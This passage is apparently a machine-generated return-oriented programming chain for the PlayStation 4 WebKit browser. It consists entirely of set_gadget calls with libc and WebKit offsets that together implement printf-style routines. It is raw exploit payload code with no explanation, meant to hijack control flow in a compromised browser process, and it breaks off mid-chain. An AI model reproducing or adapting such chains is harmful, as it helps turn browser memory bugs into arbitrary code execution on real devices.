set_gadget(libc_base+782311,); //pop rsp
//L12590:
db([0, 0]); // 0x0
//_fctprintf:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+567608, //L12593
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12593:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+567672, //L12595
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12595:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([32, 0]); // 0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+567760, //L12597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12596:
db([32, 0]); // 0x20
set_gadget(libc_base+759608,); //pop rax
//L12597:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+567816, //L12598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12598:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12600:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12601:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12603:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+567992, //L12606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+567976, //L12604
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12604:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12606:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+568080, //L12607
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+568096, //L12609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12607:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12609:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12610:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L12612:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+568256, //L12615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+568240, //L12613
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12613:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12615:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+568344, //L12616
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+568360, //L12618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12616:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12618:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12619:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12620:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12622:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+568536, //L12625
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+568520, //L12623
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12623:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12625:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+568680, //L12628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+568648, //L12626
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+568664, //L12627
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12626:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12627:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12628:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+568760, //L12629
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12629:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12631:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+568880, //L12634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+568864, //L12632
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12632:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12634:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+569024, //L12637
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+568992, //L12635
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+569008, //L12636
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12635:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12636:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12637:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L12638:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L12639:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L12640:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+569296, //L12642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+569312, //L12643
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+569280, //L12641
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12641:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12642:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12643:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+569408, //L12645
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+569392, //L12644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12644:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12645:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+569504, //L12647
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12646:
db([4294967272, 4294967295]); // -0x18
set_gadget(libc_base+759608,); //pop rax
//L12647:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L12648:
ropchain+171056, //__out_fct
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L12650:
ropchain+569664, //L12649
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+317712, //__vsnprintf
//L12649:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+569736, //L12651
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12651:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12653:
db([4294967268, 4294967295]); // -0x1c
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L12655:
db([4294967268, 4294967295]); // -0x1c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+569896, //L12658
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+569880, //L12656
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12656:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12658:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+570072, //L12661
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+570088, //L12662
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+570040, //L12659
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+570056, //L12660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12659:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12660:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12661:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12662:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+570168, //L12663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+570184, //L12664
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12663:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12664:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+570296, //L12665
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+570328, //L12667
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+570312, //L12666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12665:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12666:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12667:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+570432, //L12668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+570448, //L12669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12668:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12669:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+570568, //L12670
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+570552, //L12671
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12671:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12670:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+570656, //L12673
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+570640, //L12672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12672:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12673:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+570760, //L12674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+570776, //L12675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12674:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12675:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+570896, //L12676
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+570880, //L12677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12677:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12676:
db([0, 0]); // 0x0
//__putchar:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+570968, //L12679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12679:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+571056, //L12680
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+571104, //L12683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12680:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12681:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12682:
db([0, 0]); // 0x0
set_gadget(webkit_base+568675,); //pop r8
//L12683:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+571200, //L12685
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+571184, //L12684
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12684:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12685:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+571336, //L12688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+571304, //L12686
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12686:
db([0, 0]); // 0x0
set_gadgets([
libc_base+144605, //pop rdi
//L12687:
ropchain+136, //_ps4_printf_fd
libc_base+759608 //pop rax
]);
//L12688:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+571512, //L12691
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+571528, //L12692
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+571480, //L12689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+571496, //L12690
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12689:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12690:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12691:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12692:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+571608, //L12693
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+571624, //L12694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12693:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12694:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+571736, //L12695
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+571768, //L12697
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+571752, //L12696
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12695:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12696:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12697:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+2115150, //setle al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+571944, //L12699
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+571960, //L12700
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+571928, //L12698
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12698:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12699:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12700:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+572072, //L12702
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+572120, //L12705
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+572088, //L12703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12702:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12703:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12704:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12705:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+572232, //L12706+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+572224, //L12706
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L12706:
db([0, 0]); // 0x0
set_gadgets([
ropchain+572248, //L12706+24
ropchain+573080, //L12701
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+572288, //L12707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12707:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12708:
db([1, 0]); // 0x1
set_gadget(libc_base+144605,); //pop rdi
//L12709:
db([1, 0]); // 0x1
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+572416, //L12711
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+572400, //L12710
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12710:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12711:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+572512, //L12713
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12712:
db([16, 0]); // 0x10
set_gadget(libc_base+759608,); //pop rax
//L12713:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+572656, //L12716
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+572624, //L12714
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12714:
db([0, 0]); // 0x0
set_gadgets([
libc_base+144605, //pop rdi
//L12715:
ropchain+136, //_ps4_printf_fd
libc_base+759608 //pop rax
]);
//L12716:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+572832, //L12719
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+572848, //L12720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+572800, //L12717
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+572816, //L12718
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12717:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12718:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12719:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12720:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+572944, //L12722
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+572928, //L12721
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12721:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12722:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L12724:
ropchain+573048, //L12723
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+575512, //L12725
//L12723:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L12701:
libc_base+764760, //pop rsi
ropchain+573120, //L12726
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12726:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12728:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+573240, //L12731
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+573224, //L12729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12729:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12731:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+573400, //L12735
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+573368, //L12733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+573384, //L12734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12732:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L12733:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12734:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12735:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+573456, //L12737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L12737:
